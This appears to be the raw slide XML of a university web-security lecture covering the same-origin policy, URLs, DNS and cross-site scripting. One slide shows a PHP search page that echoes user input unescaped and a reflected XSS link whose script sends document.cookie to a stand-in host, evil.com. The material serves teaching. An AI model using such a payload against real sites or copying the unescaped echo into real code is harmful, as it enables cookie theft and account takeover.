              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>page.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> accessed by:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.example.com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dir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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page2.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.example.com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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dir2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/page3.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:80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dir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page.html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err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.example.com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http://www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:81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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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example.com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4" y="2094807"/>
            <a:ext cx="394960" cy="363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8" y="3410823"/>
            <a:ext cx="394481" cy="46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5" y="2534550"/>
            <a:ext cx="395835" cy="364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44" y="3833248"/>
            <a:ext cx="394481" cy="465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44" y="4294477"/>
            <a:ext cx="394481" cy="46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4700821"/>
            <a:ext cx="377856" cy="4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Domain relaxation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-origin network requests: Access-Control-Allow-Origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-origin client-side communication: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>postMessage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Importing scripts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8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code injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sends victim a script that runs on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>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92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543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5132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20574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6764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7053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046288" y="20732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4558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24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2589213" y="2422525"/>
            <a:ext cx="257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receive malicious link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41148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49588" y="42227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9338" y="46736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2590800" y="2101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2209800" y="27590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714625" y="38576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4767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30464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846388" y="29019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514600" y="3200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 rot="1068865">
            <a:off x="2028825" y="41592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-709076">
            <a:off x="2970213" y="187320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visit web site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10523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6" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="0" animBg="1"/>
      <p:bldP spid="20" grpId="0"/>
      <p:bldP spid="21" grpId="0" animBg="1"/>
      <p:bldP spid="22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Search field on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>search.php?term</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apple</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server-side implementation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>search.php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&lt;html&gt;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   &lt;title&gt; Search Results &lt;/title&gt;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   &lt;body&gt; Results for &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>php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echo $_GET[term] ?&gt;: ...&lt;/body&gt;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&lt;/html&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if victim instead clicks on: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</a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://victim.com/search.php?term=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1005840" lvl="2" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil.com?cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =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” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> )  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85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2667000"/>
            <a:ext cx="8116137" cy="3810000"/>
            <a:chOff x="762000" y="2514600"/>
            <a:chExt cx="8116137" cy="3810000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762000" y="5257800"/>
              <a:ext cx="4648200" cy="1066800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622174" y="2514600"/>
              <a:ext cx="3255963" cy="295275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</p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8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98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135062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3600" y="754062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73863" y="41719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3" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1475581"/>
            <a:ext cx="3363912" cy="43418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14" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21119711">
            <a:off x="2709070" y="1251971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gets bad link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="2895600"/>
            <a:ext cx="457200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 rot="1101636">
            <a:off x="3044825" y="31384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user clicks on link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 rot="1122022">
            <a:off x="3300413" y="38179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victim echoes user input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3257550"/>
            <a:ext cx="5021263" cy="1619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ADB72B-0A18-B184-CC81-18F5175D26E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="4514850"/>
            <a:ext cx="5334000" cy="2266950"/>
            <a:chOff x="457200" y="4514850"/>
            <a:chExt cx="5334000" cy="2266950"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="TextBox 19"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="4514850"/>
              <a:ext cx="53340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/>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="2">
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="B7C1EB"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma"/>
                </a:rPr>
                <a:t>www.victim.com</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="TextBox 25"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="457200" y="4819650"/>
              <a:ext cx="5334000" cy="1962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&lt;html&gt; </a:t>
              </a:r>
            </a:p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Results for </a:t>
              </a:r>
            </a:p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  &lt;script&gt; </a:t>
              </a:r>
            </a:p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  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>window.open</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(http://</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>attacker.com</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>? </a:t>
              </a:r>
            </a:p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  ... </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>document.cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> ...) </a:t>
              </a:r>
            </a:p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  &lt;/script&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="2">
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;/html&gt;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BDDF9F-5341-FD20-5111-6610DD69835B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4533900" y="2057400"/>
            <a:ext cx="4457700" cy="950912"/>
            <a:chOff x="4533900" y="2057400"/>
            <a:chExt cx="4457700" cy="950912"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="TextBox 20"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4533900" y="2057400"/>
              <a:ext cx="44577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none"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="2">
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="B7C1EB"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma"/>
                </a:rPr>
                <a:t>www.evil.com</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Taho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33900" y="2362200"/>
              <a:ext cx="4457700" cy="646112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457200" indent="-457200">
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>http://</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>victim.com</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>search.php</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>? </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="457200" indent="-457200">
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  term= &lt;script&gt; ... &lt;/script&gt;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rot="5400000">
            <a:off x="5576887" y="3652838"/>
            <a:ext cx="1801813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781800" y="3276600"/>
            <a:ext cx="172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Inject malicious script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36888" y="4067175"/>
            <a:ext cx="214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request content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1400" y="456882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script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750050" y="28654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 rot="1039646">
            <a:off x="2713038" y="37036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084388" y="4086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2205038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759075" y="2060575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steal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 rot="-713606">
            <a:off x="2438400" y="23590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0841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  <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="0" animBg="1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</a:t>
            </a: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1D851-DACD-DD72-376F-7201B2C002DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="25908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http://www.cs.pomona.edu:80/classes/cs105/index.html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868186-51C2-8F6A-AB85-263FCC7AC615}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4525108" y="2614246"/>
            <a:ext cx="347589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9C4BE-40CB-4961-03EE-A41CD955738C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="29601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prefix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F3150-F79F-0D85-35E4-CAB07ADDC048}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="785446" y="2614246"/>
            <a:ext cx="3739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3FC5B-CBCC-6D5F-4E8E-FCC905697862}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5869431" y="2965719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suffix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03119F-8534-3C7F-CE37-EB42D1C1F780}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2971800" y="3581400"/>
            <a:ext cx="838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FCA9B-B899-542D-2030-120FA7BC4B81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267200" y="3575538"/>
            <a:ext cx="3200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EE9A5E-E3C4-3CE0-348F-1630C20F2FA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7581900" y="3575538"/>
            <a:ext cx="4191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3BCDC8-FFDE-B4F3-6AB7-DD0DA090E6F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2888198" y="394487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protocol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94F53-EA90-9CAF-8F9E-EE15537C1F6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5364698" y="394487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97C77-1259-E066-6525-DFD6B380FBEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7500344" y="395670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port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18308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 attack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loaded images</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>user content (comments, blog posts)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218202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XSS attacks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7" y="1524000"/>
            <a:ext cx="2987040" cy="2667000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="A logo of people connected together&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ECB8E55-D76B-93EE-6F22-AC424607E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361048"/>
            <a:ext cx="3613140" cy="3000001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B7CB6439-D641-5051-982B-46CC845AE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77" y="3450101"/>
            <a:ext cx="5830549" cy="3887033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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8F23F3C1-6439-F261-7CAA-AC15BBC13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6" y="4292599"/>
            <a:ext cx="2472403" cy="24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89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Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP-Only Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic Data Tainting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Script Sandboxing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1512262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BC6278-39AD-C945-AFE0-A09F210C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what's the take away…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0392934-4C02-BD49-BB14-BB72B1D17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r="3471" b="10565"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1524000"/>
            <a:ext cx="914400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09E11B-6022-764C-943E-114715A08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97490"/>
            <a:ext cx="3321050" cy="208915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AD6B6C-3F31-0045-89B7-F8E52691F64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602941" y="4038600"/>
          <a:ext cx="392205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057B62E-120D-F04C-B6DA-40A07C999D41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="330565" y="4044351"/>
            <a:ext cx="2031635" cy="2741595"/>
            <a:chOff x="406765" y="4191000"/>
            <a:chExt cx="2031635" cy="2741595"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Content Placeholder 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{202D69AE-7DB5-554B-9E14-BFAAC00AA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406765" y="4191000"/>
              <a:ext cx="2031635" cy="1338129"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Content Placeholder 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09D3E112-180A-724C-BBA2-F5EA50454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5"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="406765" y="5594465"/>
              <a:ext cx="1993200" cy="133813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1EF7734-1D78-A485-EE95-5BFD2B271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3" y="4419856"/>
            <a:ext cx="2089150" cy="2089150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="A diagram of a file&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E059AAC-78C6-D556-59B3-68A77DD69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13995"/>
            <a:ext cx="3301171" cy="2315405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Content Placeholder 26" descr="A diagram of a computer system&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{902E7C68-A189-FB91-12D0-D66CA76E8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67" y="4572000"/>
            <a:ext cx="2946229" cy="182859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6FDB73-2457-AF1D-1DCC-5EF16308316D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-7620" y="4016631"/>
            <a:ext cx="9092371" cy="2895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468F1034-48F0-57AF-0D03-4365114389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3493281" y="4426718"/>
            <a:ext cx="2157438" cy="21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662FC3-AD1A-58EB-6D65-D9515032B4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9" y="4427500"/>
            <a:ext cx="2157437" cy="21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C4531F-363B-B85F-1E5E-0E2B97429C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464" y="4425937"/>
            <a:ext cx="21590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1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98BD-EC11-844B-B2E3-19F3C96B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959B-BB23-B145-BB36-CF1C14FFC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Principals are identified by names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for web hosts, typically a domain name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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.cs.pomona.edu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Internet hosts are identified by IP addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>used by network layer to route packets between hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The role of DNS is to translate between domain names and IP addresses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1EDCD-BD55-7340-88FD-A3744D85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64" y="5248835"/>
            <a:ext cx="2949312" cy="11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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>loopback address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41910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70467" y="6042971"/>
            <a:ext cx="335540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pom-nat-84-6.pomona.edu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Box 1028">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57B3826C-82C5-DB4B-9C52-756A4877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52133"/>
            <a:ext cx="473398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www.cs.pomona.edu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134.173.71.56</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="357446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058059" y="2443013"/>
            <a:ext cx="5147563" cy="10341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little.cs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.pomona.edu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134.173.66.223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058059" y="4064000"/>
